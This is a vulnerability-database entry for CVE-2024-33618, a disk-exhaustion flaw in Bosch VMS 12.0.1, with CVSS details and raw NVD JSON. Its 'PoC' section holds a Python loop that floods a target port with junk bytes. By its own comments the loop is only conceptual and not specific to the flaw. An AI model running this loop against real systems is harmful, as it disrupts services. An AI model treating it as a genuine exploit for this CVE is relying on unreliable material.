Security Vulnerability Report
中文
CVE-2024-33618 CVSS 7.5 HIGH

CVE-2024-33618

Published: 2026-04-15 10:16:37
Last Modified: 2026-04-17 15:17:01

Description

Uncontrolled Resource Consumption in Bosch VMS Central Server in Bosch VMS 12.0.1 allows attackers to consume excessive amounts of disk space via network interface.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Bosch VMS 12.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Conceptual Proof of Concept for CVE-2024-33618 # This script attempts to trigger disk space exhaustion by sending data. # Note: The actual exploit requires specific protocol handling found in Metasploit. TARGET_IP = "192.168.1.100" # Replace with target IP TARGET_PORT = 8080 # Replace with target port def send_exploit_payload(): try: while True: # Create a socket connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((TARGET_IP, TARGET_PORT)) # Craft a payload that triggers excessive logging/storage # Adjust payload based on actual protocol reverse engineering payload = b"A" * 10000 s.send(payload) print(f"Payload sent to {TARGET_IP}:{TARGET_PORT}") s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": send_exploit_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-33618", "sourceIdentifier": "[email protected]", "published": "2026-04-15T10:16:37.120", "lastModified": "2026-04-17T15:17:00.957", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Resource Consumption in Bosch VMS Central Server in Bosch VMS 12.0.1 \r\nallows attackers to consume excessive amounts of disk space via network interface."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-162032-BT.html", "source": "[email protected]"}]}}